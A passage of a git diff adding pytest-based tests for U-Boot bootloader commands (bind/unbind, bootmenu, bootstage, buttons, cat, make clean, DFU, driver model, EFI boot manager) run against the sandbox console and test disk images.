'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert 'bind-test-child2' not in tree + + + #Bind child #2. No error expected and all devices should be there + response = u_boot_console.run_command('bind /bind-test/bind-test-child2 simple_bus') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #Unbind parent. No error expected. All devices should be removed and unbound + response = u_boot_console.run_command('unbind /bind-test') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert 'bind-test' not in tree + assert 'bind-test-child1' not in tree + assert 'bind-test-child2' not in tree + + #try binding invalid node with valid driver + response = u_boot_console.run_command('bind /not-a-valid-node simple_bus') + assert response != '' + tree = u_boot_console.run_command('dm tree') + assert 'not-a-valid-node' not in tree + + #try binding valid node with invalid driver + response = u_boot_console.run_command('bind /bind-test not_a_driver') + assert response != '' + tree = u_boot_console.run_command('dm tree') + assert 'bind-test' not in tree + + #bind /bind-test. Device should come up as well as its children + response = u_boot_console.run_command('bind /bind-test simple_bus') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + response = u_boot_console.run_command('unbind /bind-test') + assert response == '' + +def get_next_line(tree, name): + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + child_line = '' + for idx, line in enumerate(treelines): + if '-- ' + name in line: + try: + child_line = treelines[idx+1] + except: + pass + break + return child_line + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +@pytest.mark.singlethread +def test_bind_unbind_with_uclass(u_boot_console): + #bind /bind-test + response = u_boot_console.run_command('bind /bind-test simple_bus') + assert response == '' + + #make sure bind-test-child2 is there and get its uclass/index pair + tree = u_boot_console.run_command('dm tree') + child2_line = [x.strip() for x in tree.splitlines() if '-- bind-test-child2' in x] + assert len(child2_line) == 1 + + child2_uclass = child2_line[0].split()[0] + child2_index = int(child2_line[0].split()[1]) + + #bind simple_bus as a child of bind-test-child2 + response = u_boot_console.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = u_boot_console.run_command('dm tree') + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = u_boot_console.run_command('unbind simple_bus {}'.format(child_of_child2_index)) + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + assert not in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line == '' + + #bind simple_bus as a child of bind-test-child2 + response = u_boot_console.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = u_boot_console.run_command('dm tree') + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = u_boot_console.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + assert response == '' + + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line == '' + + #unbind the child again and check it doesn't change the tree + tree_old = u_boot_console.run_command('dm tree') + response = u_boot_console.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + tree_new = u_boot_console.run_command('dm tree') + + assert response == '' + assert tree_old == tree_new + + response = u_boot_console.run_command('unbind /bind-test') + assert response == '' diff --git a/test/py/tests/test_bootmenu.py b/test/py/tests/test_bootmenu.py new file mode 100644 index 00000000000..70f51de699f --- /dev/null +++ b/test/py/tests/test_bootmenu.py @@ -0,0 +1,46 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Test bootmenu""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootmenu') +def test_bootmenu(u_boot_console): + """Test bootmenu + + u_boot_console -- U-Boot console + """ + + with u_boot_console.temporary_timeout(500): + u_boot_console.run_command('setenv bootmenu_default 1') + u_boot_console.run_command('setenv bootmenu_0 test 1=echo ok 1') + u_boot_console.run_command('setenv bootmenu_1 test 2=echo ok 2') + u_boot_console.run_command('setenv bootmenu_2 test 3=echo ok 3') + u_boot_console.run_command('bootmenu 2', wait_for_prompt=False) + for i in ('U-Boot Boot Menu', 'test 1', 'test 2', 'test 3', 'autoboot'): + u_boot_console.p.expect([i]) + # Press enter key to execute default entry + response = u_boot_console.run_command(cmd='\x0d', wait_for_echo=False, send_nl=False) + assert 'ok 2' in response + u_boot_console.run_command('bootmenu 2', wait_for_prompt=False) + u_boot_console.p.expect(['autoboot']) + # Press up key to select prior entry followed by the enter key + response = u_boot_console.run_command(cmd='\x1b\x5b\x41\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 1' in response + u_boot_console.run_command('bootmenu 2', wait_for_prompt=False) + u_boot_console.p.expect(['autoboot']) + # Press down key to select next entry followed by the enter key + response = u_boot_console.run_command(cmd='\x1b\x5b\x42\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 3' in response + u_boot_console.run_command('bootmenu 2; echo rc:$?', wait_for_prompt=False) + u_boot_console.p.expect(['autoboot']) + # Press the escape key + response = u_boot_console.run_command(cmd='\x1b', wait_for_echo=False, send_nl=False) + assert 'ok' not in response + assert 'rc:0' in response + u_boot_console.run_command('setenv bootmenu_default') + u_boot_console.run_command('setenv bootmenu_0') + u_boot_console.run_command('setenv bootmenu_1') + u_boot_console.run_command('setenv bootmenu_2') diff --git a/test/py/tests/test_bootstage.py b/test/py/tests/test_bootstage.py new file mode 100644 index 00000000000..a9eb9f0b4a1 --- /dev/null +++ b/test/py/tests/test_bootstage.py @@ -0,0 +1,67 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Test the bootstage command. + +It is used for checking the boot progress and timing by printing the bootstage +report, stashes the data into memory and unstashes the data from memory. + +Note: This test relies on boardenv_* containing configuration values to define +the data size, memory address, and bootstage magic address (defined in +common/bootstage.c). Without this, bootstage stash and unstash tests will be +automatically skipped. + +For example: +env__bootstage_cmd_file = { + 'addr': 0x200000, + 'size': 0x1000, + 'bootstage_magic_addr': 0xb00757a3, +} +""" + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +def test_bootstage_report(u_boot_console): + output = u_boot_console.run_command('bootstage report') + assert 'Timer summary in microseconds' in output + assert 'Accumulated time:' in output + assert 'dm_r' in output + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +@pytest.mark.buildconfigspec('bootstage_stash') +def test_bootstage_stash(u_boot_console): + f = u_boot_console.config.env.get('env__bootstage_cmd_file', None) + if not f: + pytest.skip('No bootstage environment file is defined') + + addr = f.get('addr') + size = f.get('size') + bootstage_magic = f.get('bootstage_magic_addr') + expected_text = 'dm_r' + + u_boot_console.run_command('bootstage stash %x %x' % (addr, size)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + output = u_boot_console.run_command('md %x 100' % addr) + + # Check BOOTSTAGE_MAGIC address at 4th byte address + assert '0x' + output.split('\n')[0].split()[4] == hex(bootstage_magic) + + # Check expected string in last column of output + output_last_col = ''.join([i.split()[-1] for i in output.split('\n')]) + assert expected_text in output_last_col + return addr, size + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +@pytest.mark.buildconfigspec('bootstage_stash') +def test_bootstage_unstash(u_boot_console): + addr, size = test_bootstage_stash(u_boot_console) + u_boot_console.run_command('bootstage unstash %x %x' % (addr, size)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_button.py b/test/py/tests/test_button.py new file mode 100644 index 00000000000..3b7f148c8fc --- /dev/null +++ b/test/py/tests/test_button.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +def test_button_list(u_boot_console): + """Test listing buttons""" + + response = u_boot_console.run_command('button list; echo rc:$?') + assert('button1' in response) + assert('button2' in response) + assert('rc:0' in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_button_return_code(u_boot_console): + """Test correct reporting of the button status + + The sandbox gpio driver reports the last output value as input value. + We can use this in our test to emulate different input statuses. + """ + + u_boot_console.run_command('gpio set a3; gpio input a3'); + response = u_boot_console.run_command('button button1; echo rc:$?') + assert('on' in response) + assert('rc:0' in response) + + u_boot_console.run_command('gpio clear a3; gpio input a3'); + response = u_boot_console.run_command('button button1; echo rc:$?') + assert('off' in response) + assert('rc:1' in response) + + response = u_boot_console.run_command('button nonexistent-button; echo rc:$?') + assert('not found' in response) + assert('rc:1' in response) diff --git a/test/py/tests/test_cat/conftest.py b/test/py/tests/test_cat/conftest.py new file mode 100644 index 00000000000..320e7ebd295 --- /dev/null +++ b/test/py/tests/test_cat/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for cat command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def cat_data(u_boot_config): + """Set up a file system to be used in cat tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_cat' + image_path = u_boot_config.persistent_data_dir + '/cat.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_cat/test_cat.py b/test/py/tests/test_cat/test_cat.py new file mode 100644 index 00000000000..132527bd4c2 --- /dev/null +++ b/test/py/tests/test_cat/test_cat.py @@ -0,0 +1,20 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for cat command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_cat') +def test_cat(u_boot_console, cat_data): + """ Unit test for cat + + Args: + u_boot_console -- U-Boot console + cat_data -- Path to the disk image used for testing. + """ + response = u_boot_console.run_command_list([ + f'host bind 0 {cat_data}', + 'cat host 0 hello']) + assert 'hello world' in response diff --git a/test/py/tests/test_cleanup_build.py b/test/py/tests/test_cleanup_build.py new file mode 100644 index 00000000000..aca90cb1107 --- /dev/null +++ b/test/py/tests/test_cleanup_build.py @@ -0,0 +1,110 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2023 Tobias Deiminger <tdmg@linutronix.de> + +"""Test for unexpected leftovers after make clean""" + +import itertools +import os +import pathlib +import shutil +import sys + +import pytest + +# pylint: disable=redefined-outer-name + + +@pytest.fixture +def tmp_copy_of_builddir(u_boot_config, tmp_path): + """For each test, provide a temporary copy of the initial build directory.""" + if os.path.realpath(u_boot_config.source_dir) == os.path.realpath( + u_boot_config.build_dir + ): + pytest.skip("Leftover detection requires out of tree build.") + return None + shutil.copytree( + u_boot_config.build_dir, + tmp_path, + symlinks=True, + dirs_exist_ok=True, + ) + return tmp_path + + +@pytest.fixture(scope="module") +def run_make(u_boot_log): + """Provide function to run and log make without connecting to u-boot console.""" + runner = u_boot_log.get_runner("make", sys.stdout) + + def _run_make(build_dir, target): + cmd = ["make", f"O={build_dir}", target] + runner.run(cmd) + + yield _run_make + runner.close() + + +@pytest.fixture(scope="module") +def most_generated_files(): + """Path.glob style patterns to describe what should be removed by 'make clean'.""" + return ( + "**/*.c", + "**/*.dtb", + "**/*.dtbo", + "**/*.o", + "**/*.py", + "**/*.pyc", + "**/*.so", + "**/*.srec", + "u-boot*", + "[svt]pl/u-boot*", + ) + + +@pytest.fixture(scope="module") +def all_generated_files(most_generated_files): + """Path.glob style patterns to describe what should be removed by 'make mrproper'.""" + return most_generated_files + (".config", "**/*.h") + + +def find_files(search_dir, include_patterns, exclude_dirs=None): + """Find files matching include_patterns, unless it's in one of exclude_dirs. + + include_patterns -- Path.glob style pattern relative to search dir + exclude_dir -- directories to exclude, expected relative to search dir + """ + matches = [] + exclude_dirs = [] if exclude_dirs is None else exclude_dirs + for abs_path in itertools.chain.from_iterable( + pathlib.Path(search_dir).glob(pattern) for pattern in include_patterns + ): + if abs_path.is_dir(): + continue + rel_path = pathlib.Path(os.path.relpath(abs_path, search_dir)) + if not any( + rel_path.is_relative_to(exclude_dir) for exclude_dir in exclude_dirs + ): + matches.append(rel_path) + return matches + + +def test_clean(run_make, tmp_copy_of_builddir, most_generated_files): + """Test if 'make clean' deletes most generated files.""" + run_make(tmp_copy_of_builddir, "clean") + leftovers = find_files( + tmp_copy_of_builddir, + most_generated_files, + exclude_dirs=["scripts", "test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" + + +def test_mrproper(run_make, tmp_copy_of_builddir, all_generated_files): + """Test if 'make mrproper' deletes current configuration and all generated files.""" + run_make(tmp_copy_of_builddir, "mrproper") + leftovers = find_files( + tmp_copy_of_builddir, + all_generated_files, + exclude_dirs=["test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" diff --git a/test/py/tests/test_dfu.py b/test/py/tests/test_dfu.py new file mode 100644 index 00000000000..5d87eb349bf --- /dev/null +++ b/test/py/tests/test_dfu.py @@ -0,0 +1,320 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "dfu" command. The test starts DFU in U-Boot, waits for USB +# device enumeration on the host, executes dfu-util multiple times to test +# various transfer sizes, many of which trigger USB driver edge cases, and +# finally aborts the "dfu" command in U-Boot. + +import os +import os.path +import pytest +import u_boot_utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_usb_dev_node': '/dev/usbdev-p2371-2180', + # This parameter is optional /if/ you only have a single board + # attached to your host at a time. + 'host_usb_port_path': '3-13', + }, +) + +# Optional entries (required only when 'alt_id_test_file' and +# 'alt_id_dummy_file' are specified). +test_file_name = '/dfu_test.bin' +dummy_file_name = '/dfu_dummy.bin' +# Above files are used to generate proper 'alt_info' entry +'alt_info': '/%s ext4 0 2;/%s ext4 0 2' % (test_file_name, dummy_file_name), + +env__dfu_configs = ( + # eMMC, partition 1 + { + 'fixture_id': 'emmc', + 'alt_info': '/dfu_test.bin ext4 0 1;/dfu_dummy.bin ext4 0 1', + 'cmd_params': 'mmc 0', + # This value is optional. + # If present, it specified the set of transfer sizes tested. + # If missing, a default list of sizes will be used, which covers + # various useful corner cases. + # Manually specifying test sizes is useful if you wish to test 4 DFU + # configurations, but don't want to test every single transfer size + # on each, to avoid bloating the overall time taken by testing. + 'test_sizes': (63, 64, 65), + # This value is optional. + # The name of the environment variable that the the dfu command reads + # alt info from. If unspecified, this defaults to dfu_alt_info, which is + # valid for most systems. Some systems use a different variable name. + # One example is the Odroid XU3, which automatically generates + # $dfu_alt_info, each time the dfu command is run, by concatenating + # $dfu_alt_boot and $dfu_alt_system. + 'alt_info_env_name': 'dfu_alt_system', + # This value is optional. + # For boards which require the 'test file' alt setting number other than + # default (0) it is possible to specify exact file name to be used as + # this parameter. + 'alt_id_test_file': test_file_name, + # This value is optional. + # For boards which require the 'dummy file' alt setting number other + # than default (1) it is possible to specify exact file name to be used + # as this parameter. + 'alt_id_dummy_file': dummy_file_name, + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) An optional udev rule to give you a persistent value to use in +host_usb_dev_node. For example: + +IMPORT{builtin}="path_id" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="", SYMLINK+="bus/usb/by-path/$env{ID_PATH}" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="?*", SYMLINK+="bus/usb/by-path/$env{ID_PATH}-port$env{.ID_PORT}" +""" + +# The set of file sizes to test. These values trigger various edge-cases such +# as one less than, equal to, and one greater than typical USB max packet +# sizes, and similar boundary conditions. +test_sizes_default = ( + 64 - 1, + 64, + 64 + 1, + 128 - 1, + 128, + 128 + 1, + 960 - 1, + 960, + 960 + 1, + 4096 - 1, + 4096, + 4096 + 1, + 1024 * 1024 - 1, + 1024 * 1024, + 8 * 1024 * 1024, +) + +first_usb_dev_port = None + +@pytest.mark.buildconfigspec('cmd_dfu') +@pytest.mark.requiredtool('dfu-util') +def test_dfu(u_boot_console, env__usb_dev_port, env__dfu_config): + """Test the "dfu" command; the host system must be able to enumerate a USB + device when "dfu" is running, various DFU transfers are tested, and the + USB device must disappear when "dfu" is aborted. + + Args: + u_boot_console: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__dfu_config: The single DFU (memory region) configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + def start_dfu(): + """Start U-Boot's dfu shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. + """ + + u_boot_utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], True) + fh = u_boot_utils.attempt_to_open_file( + env__usb_dev_port['host_usb_dev_node']) + if fh: + fh.close() + raise Exception('USB device present before dfu command invoked') + + u_boot_console.log.action( + 'Starting long-running U-Boot dfu shell command') + + dfu_alt_info_env = env__dfu_config.get('alt_info_env_name', \ + 'dfu_alt_info') + + cmd = 'setenv "%s" "%s"' % (dfu_alt_info_env, + env__dfu_config['alt_info']) + u_boot_console.run_command(cmd) + + cmd = 'dfu 0 ' + env__dfu_config['cmd_params'] + u_boot_console.run_command(cmd, wait_for_prompt=False) + u_boot_console.log.action('Waiting for DFU USB device to appear') + fh = u_boot_utils.wait_until_open_succeeds( + env__usb_dev_port['host_usb_dev_node']) + fh.close() + + def stop_dfu(ignore_errors): + """Stop U-Boot's dfu shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + try: + u_boot_console.log.action( + 'Stopping long-running U-Boot dfu shell command') + u_boot_console.ctrlc() + u_boot_console.log.action( + 'Waiting for DFU USB device to disappear') + u_boot_utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], ignore_errors) + except: + if not ignore_errors: + raise + + def run_dfu_util(alt_setting, fn, up_dn_load_arg): + """Invoke dfu-util on the host. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + up_dn_load_arg: '-U' or '-D' depending on whether a DFU upload or + download operation should be performed. + + Returns: + Nothing. + """ + + cmd = ['dfu-util', '-a', alt_setting, up_dn_load_arg, fn] + if 'host_usb_port_path' in env__usb_dev_port: + cmd += ['-p', env__usb_dev_port['host_usb_port_path']] + u_boot_utils.run_and_log(u_boot_console, cmd) + u_boot_console.wait_for('Ctrl+C to exit ...') + + def dfu_write(alt_setting, fn): + """Write a file to the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + run_dfu_util(alt_setting, fn, '-D') + + def dfu_read(alt_setting, fn): + """Read a file from the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + # dfu-util fails reads/uploads if the host file already exists + if os.path.exists(fn): + os.remove(fn) + run_dfu_util(alt_setting, fn, '-U') + + def dfu_write_read_check(size): + """Test DFU transfers of a specific size of data + + This function first writes data to the board then reads it back and + compares the written and read back data. Measures are taken to avoid + certain types of false positives. + + Args: + size: The data size to test. + + Returns: + Nothing. + """ + + test_f = u_boot_utils.PersistentRandomFile(u_boot_console, + 'dfu_%d.bin' % size, size) + readback_fn = u_boot_console.config.result_dir + '/dfu_readback.bin' + + u_boot_console.log.action('Writing test data to DFU primary ' + + 'altsetting') + dfu_write(alt_setting_test_file, test_f.abs_fn) + + u_boot_console.log.action('Writing dummy data to DFU secondary ' + + 'altsetting to clear DFU buffers') + dfu_write(alt_setting_dummy_file, dummy_f.abs_fn) + + u_boot_console.log.action('Reading DFU primary altsetting for ' + + 'comparison') + dfu_read(alt_setting_test_file, readback_fn) + + u_boot_console.log.action('Comparing written and read data') + written_hash = test_f.content_hash + read_back_hash = u_boot_utils.md5sum_file(readback_fn, size) + assert(written_hash == read_back_hash) + + # This test may be executed against multiple USB ports. The test takes a + # long time, so we don't want to do the whole thing each time. Instead, + # execute the full test on the first USB port, and perform a very limited + # test on other ports. In the limited case, we solely validate that the + # host PC can enumerate the U-Boot USB device. + global first_usb_dev_port + if not first_usb_dev_port: + first_usb_dev_port = env__usb_dev_port + if env__usb_dev_port == first_usb_dev_port: + sizes = env__dfu_config.get('test_sizes', test_sizes_default) + else: + sizes = [] + + dummy_f = u_boot_utils.PersistentRandomFile(u_boot_console, + 'dfu_dummy.bin', 1024) + + alt_setting_test_file = env__dfu_config.get('alt_id_test_file', '0') + alt_setting_dummy_file = env__dfu_config.get('alt_id_dummy_file', '1') + + ignore_cleanup_errors = True + try: + start_dfu() + + u_boot_console.log.action( + 'Overwriting DFU primary altsetting with dummy data') + dfu_write(alt_setting_test_file, dummy_f.abs_fn) + + for size in sizes: + with u_boot_console.log.section('Data size %d' % size): + dfu_write_read_check(size) + # Make the status of each sub-test obvious. If the test didn't + # pass, an exception was thrown so this code isn't executed. + u_boot_console.log.status_pass('OK') + ignore_cleanup_errors = False + finally: + stop_dfu(ignore_cleanup_errors) diff --git a/test/py/tests/test_dm.py b/test/py/tests/test_dm.py new file mode 100644 index 00000000000..68d4ea12235 --- /dev/null +++ b/test/py/tests/test_dm.py @@ -0,0 +1,81 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Sean Anderson + +import pytest + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_compat(u_boot_console): + """Test that each driver in `dm tree` is also listed in `dm compat`.""" + response = u_boot_console.run_command('dm tree') + driver_index = response.find('Driver') + assert driver_index != -1 + drivers = (line[driver_index:].split()[0] + for line in response[:-1].split('\n')[2:]) + + response = u_boot_console.run_command('dm compat') + for driver in drivers: + assert driver in response + + # check sorting - output looks something like this: + # testacpi 0 [ ] testacpi_drv |-- acpi-test + # testacpi 1 [ ] testacpi_drv | `-- child + # pci_emul_p 1 [ ] pci_emul_parent_drv |-- pci-emul2 + # pci_emul 5 [ ] sandbox_swap_case_em | `-- emul2@1f,0 + + # The number of '| ' and '--' matches indicate the indent level. We start + # checking sorting only after UCLASS_AXI_EMUL after which the names should + # be sorted. + + response = u_boot_console.run_command('dm tree -s') + lines = response.split('\n')[2:] + stack = [] # holds where we were up to at the previous indent level + prev = '' # uclass name of previous line + start = False + for line in lines: + indent = line.count('| ') + ('--' in line) + cur = line.split()[0] + if not start: + if cur != 'axi_emul': + continue + start = True + + # Handle going up or down an indent level + if indent > len(stack): + stack.append(prev) + prev = '' + elif indent < len(stack): + prev = stack.pop() + + # Check that the current uclass name is not alphabetically before the + # previous one + if 'emul' not in cur and cur < prev: + print('indent', cur >= prev, indent, prev, cur, stack) + assert cur >= prev + prev = cur + + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_drivers(u_boot_console): + """Test that each driver in `dm compat` is also listed in `dm drivers`.""" + response = u_boot_console.run_command('dm compat') + drivers = (line[:20].rstrip() for line in response[:-1].split('\n')[2:]) + response = u_boot_console.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_static(u_boot_console): + """Test that each driver in `dm static` is also listed in `dm drivers`.""" + response = u_boot_console.run_command('dm static') + drivers = (line[:25].rstrip() for line in response[:-1].split('\n')[2:]) + response = u_boot_console.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_uclass(u_boot_console): + response = u_boot_console.run_command("dm uclass") + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_devres(u_boot_console): + response = u_boot_console.run_command("dm devres") diff --git a/test/py/tests/test_efi_bootmgr/conftest.py b/test/py/tests/test_efi_bootmgr/conftest.py new file mode 100644 index 00000000000..0eca025058e --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/conftest.py @@ -0,0 +1,38 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI bootmanager test.""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_bootmgr_data(u_boot_config): + """Set up a file system to be used in UEFI bootmanager tests. + + Args: + u_boot_config -- U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_bootmgr' + image_path = u_boot_config.persistent_data_dir + '/efi_bootmgr.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py new file mode 100644 index 00000000000..1bb59d8fcf8 --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py @@ -0,0 +1,44 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI bootmanager +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +@pytest.mark.singlethread +def test_efi_bootmgr(u_boot_console, efi_bootmgr_data): + """ Unit test for UEFI bootmanager + The efidebug command is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + u_boot_console -- U-Boot console + efi_bootmgr_data -- Path to the disk image used for testing. + """ + u_boot_console.run_command(cmd = f'host bind 0 {efi_bootmgr_data}') + + u_boot_console.run_command(cmd = 'efidebug boot add ' \ + '-b 0001 label-1 host 0:1 initrddump.efi ' \ + '-i host 0:1 initrd-1.img -s nocolor') + u_boot_console.run_command(cmd = 'efidebug boot dump') + u_boot_console.run_command(cmd = 'efidebug boot order 0001') + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + u_boot_console.run_command(cmd = 'efidebug boot add ' \ + '-B 0002 label-2 host 0:1 initrddump.efi ' \ + '-I host 0:1 initrd-2.img -s nocolor') + u_boot_console.run_command(cmd = 'efidebug boot dump') + u_boot_console.run_command(cmd = 'efidebug boot order 0002') + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = u_boot_console.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + u_boot_console.run_command(cmd = 'exit', wait_for_echo=False) + + u_boot_console.run_command(cmd = 'efidebug boot rm 0001') + u_boot_console.run_command(cmd = 'efidebug boot rm 0002') diff --git a/test/py/tests/test_efi_capsule/capsule_common.py b/test/py/tests/test_efi_capsule/capsule_common.py new file mode 100644 index 00000000000..fc0d851c619 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_common.py @@ -0,0 +1,142 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2023, Linaro Limited + + +"""Common function for UEFI capsule test.""" + +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR + +def capsule_setup(u_boot_console, disk_img, osindications): + """setup the test + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + osindications -- String of osindications value. + """ + u_boot_console.run_command_list([ + f'host bind 0 {disk_img}', + 'printenv -e PlatformLangCodes', # workaround for terminal size determination + 'efidebug boot add -b 1 TEST host 0:1 